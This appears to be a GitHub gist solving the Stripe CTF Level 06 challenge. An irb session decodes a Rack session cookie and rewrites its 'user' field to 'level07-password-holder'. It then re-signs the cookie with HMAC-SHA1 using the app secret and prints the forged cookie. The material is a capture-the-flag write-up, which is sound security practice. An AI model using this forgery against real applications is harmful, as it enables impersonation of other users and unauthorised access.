Stripe CTF Level 06 Session/Cookie Hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// See https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb | |
1.9.3p194 :096 > data = "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5 | |
1.9.3p194 :097"> OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F | |
1.9.3p194 :098"> TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy | |
1.9.3p194 :099"> Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5 | |
1.9.3p194 :100"> Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw | |
1.9.3p194 :101"> YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx | |
1.9.3p194 :102"> MDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3 | |
1.9.3p194 :103"> VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p | |
1.9.3p194 :104"> ZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh | |
1.9.3p194 :105"> ZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA== | |
1.9.3p194 :106"> " | |
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3\nVDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p\nZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh\nZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n" | |
1.9.3p194 :107 > OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) | |
=> "6310248bab6197cf93953a16a9a407f862bce45a" | |
1.9.3p194 :108 > | |
1.9.3p194 :117 > | |
1.9.3p194 :118 > data = Marshal.load(data.unpack('m').first) | |
=> {"tracking"=>{"HTTP_USER_AGENT"=>"6906a924698f710c8960792ba519ea285ecbed86", "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794", "HTTP_ACCEPT_LANGUAGE"=>"dd065ed263c67d799f943ab6c39b55c5e008cbb5"}, "csrf"=>"57e34024aba4b0c5a93482cdb3310ef155351c22224b41087f90162cc8107d1b", "user"=>"philfreo", "csrf.token"=>"39dQjjZWK7T4r4VNdTZHBvupvCEvtllfGIbzMC9Wl1s=", "session_id"=>"20b2353b5fd6520b3b4587ae84da93f228b5e349fafd789ddc39888c9970ac1d"} | |
1.9.3p194 :119 > data['user'] = 'level07-password-holder' | |
=> "level07-password-holder" | |
1.9.3p194 :120 > data = [Marshal.dump(data)].pack('m') | |
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j\nc3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ\nYnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4\nN2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n" | |
1.9.3p194 :121 > sig = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) | |
=> "992cee0782e5fad2157f777bf27eca32979cb411" | |
1.9.3p194 :122 > | |
1.9.3p194 :123 > | |
1.9.3p194 :124 > | |
1.9.3p194 :125 > puts data << '--' << sig | |
BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5 | |
OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F | |
TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy | |
Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5 | |
Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw | |
YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx | |
MDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j | |
c3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ | |
YnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4 | |
N2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA== | |
--992cee0782e5fad2157f777bf27eca32979cb411 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment